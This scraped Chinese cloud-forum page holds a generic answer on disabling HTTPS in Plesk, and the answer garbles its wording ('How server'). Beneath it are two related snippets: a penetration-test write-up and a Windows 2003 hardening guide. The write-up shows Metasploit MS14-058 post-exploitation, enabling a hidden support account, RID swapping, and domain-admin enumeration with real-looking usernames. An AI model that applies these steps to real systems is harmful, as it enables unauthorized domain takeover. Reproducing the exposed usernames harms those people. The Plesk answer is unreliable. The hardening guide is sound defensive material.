首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

如何使用Plesk在我的How服务器上禁用https?

Plesk是一款流行的服务器管理面板,它提供了简单易用的界面来管理服务器和网站。如果您想在您的How服务器上禁用HTTPS,可以按照以下步骤进行操作:

  1. 登录到Plesk控制面板。通常,您可以通过在浏览器中输入服务器的IP地址或域名后加上“:8443”来访问Plesk控制面板,例如:https://your-server-ip:8443。
  2. 在Plesk控制面板中,找到您想要禁用HTTPS的网站,并点击进入该网站的设置页面。
  3. 在网站设置页面中,找到“Hosting & DNS”或类似的选项,然后点击进入。
  4. 在“Hosting & DNS”页面中,找到“Security”或类似的选项,然后点击进入。
  5. 在“Security”页面中,您可以找到“SSL/TLS support”或类似的选项。将其设置为“Off”或禁用状态。
  6. 确认您的更改,并保存设置。

通过以上步骤,您已成功禁用了您的How服务器上的HTTPS。请注意,禁用HTTPS可能会导致您的网站在浏览器中显示为不安全,因此请谨慎操作,并确保您的网站内容不涉及敏感信息。

关于Plesk的更多信息和使用指南,您可以参考腾讯云的相关产品Plesk的介绍页面:Plesk产品介绍

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

  • 记一次MS14-058到域控实战记录

    msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_account msf post(enable_support_account) > set password 7a57a5a743894a0e msf post(enable_support_account) > set session 2 msf post(enable_support_account) > exploit [*] Target OS is Windows .NET Server (Build 3790, Service Pack 2). [*] Harvesting users... [+] Found SUPPORT_388945a0 account! [*] Target RID is 1004 [*] Account is disabled, activating... [*] Swapping RIDs...! [*] Setting password to 7a57a5a743894a0e [*] Post module execution completed 用于远程桌面连接的3389端口被管理员修改过了,根据经验猜测3392应该是修改后的端口号,在远程连接界面看到存在域,说明这台机器在HOSTING域内。 Webshell执行域信息搜集相关命令时会提示:System error 5 has occurred . Access is denied . 。访问被拒绝,权限问题。 ipconfig /all //网卡配置信息,所属域以及IP段 ping backbox //显示该机器名的IP net view //显示当前域中的计算机列表 net view /domain //查看有多少个域 net user /domain //获取所有域用户列表 net group /domain //获取域用户组信息 net group "domain admins" /domain //获取当前域管理员 net time /domain //域服务器一般也做时间服务器 dsquery server //查看域控服务器 dsquery subnet //查看域IP地址范围 因为meterpreter会话2里已经是SYSTEM权限了,所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息,缺图。 msf post(enable_support_account) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 13204 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain hosting.lunarpages.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- _new_win_user abbas.khan akumar alexb alext brianl dgreathouse dimitriosk epak gcager gudiyak iismon Jassi

    02

    配置更安全的服务器Windows 2003 Server

    步骤 ==================================================================================== 注意:安装和配置 Windows Server 2003。 1. 将\System32\cmd.exe转移到其他目录或更名; 2. 系统帐号尽量少,更改默认帐户名(如Administrator)和描述,密码尽量复杂; 3. 拒绝通过网络访问该计算机(匿名登录;内置管理员帐户;Support_388945a0;Guest;所有非操作系统服务帐户) 4. 建议对一般用户只给予读取权限,而只给管理员和System以完全控制权限,但这样做有可能使某些正常的脚本程序不能执行,或者某些需要写的操作不能完成,这时需要对这些文件所在的文件夹权限进行更改,建议在做更改前先在测试机器上作测试,然后慎重更改。 5. NTFS文件权限设定(注意文件的权限优先级别比文件夹的权限高): 文件类型 建议的 NTFS 权限 CGI 文件(.exe、.dll、.cmd、.pl) 脚本文件 (.asp) 包含文件(.inc、.shtm、.shtml) 静态内容(.txt、.gif、.jpg、.htm、.html) Everyone(执行) Administrators(完全控制) System(完全控制) 6. 禁止C$、D$一类的缺省共享 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters AutoShareServer、REG_DWORD、0x0 7. 禁止ADMIN$缺省共享 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters AutoShareWks、REG_DWORD、0x0 8. 限制IPC$缺省共享 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa restrictanonymous REG_DWORD 0x0 缺省 0x1 匿名用户无法列举本机用户列表 0x2 匿名用户无法连接本机IPC$共享 说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server 9. 仅给用户真正需要的权限,权限的最小化原则是安全的重要保障 10. 在本地安全策略->审核策略中打开相应的审核,推荐的审核是: 账户管理 成功 失败 登录事件 成功 失败 对象访问 失败 策略更改 成功 失败 特权使用 失败 系统事件 成功 失败 目录服务访问 失败 账户登录事件 成功 失败 审核项目少的缺点是万一你想看发现没有记录那就一点都没辙;审核项目太多不仅会占用系统资源而且会导致你根本没空去看,这样就失去了审核的意义。 与之相关的是: 在账户策略->密码策略中设定: 密码复杂性要求 启用 密码长度最小值 6位 强制密码历史 5次 最长存留期 30天 在账户策略->账户锁定策略中设定: 账户锁定 3次错误登录 锁定时间 20分钟 复位锁定计数 20分钟 11. 在Terminal Service Configration(远程服务配置)-权限-高级中配置安全审核,一般来说只要记录登录、注销事件就可以了。 12. 解除NetBios与TCP/IP协议的绑定 控制面版——网络——绑定——NetBios接口——禁用 2000:控制面版——网络和拨号连接——本地网络——属性——TCP/IP——属性——高级——WINS——禁用TCP/IP上的NETBIOS 13. 在网络连接的协议里启用TCP/IP筛选,仅开放必要的端口(如80) 14. 通过更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止139空连接 15. 修改数据包的生存时间(TTL)值 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128) 16. 防止SYN洪水攻击 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters SynAttackProtect REG_DWORD 0x2(默认值为0x0) 17. 禁止响应ICMP路由通告报文 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces\interfa

    03
    领券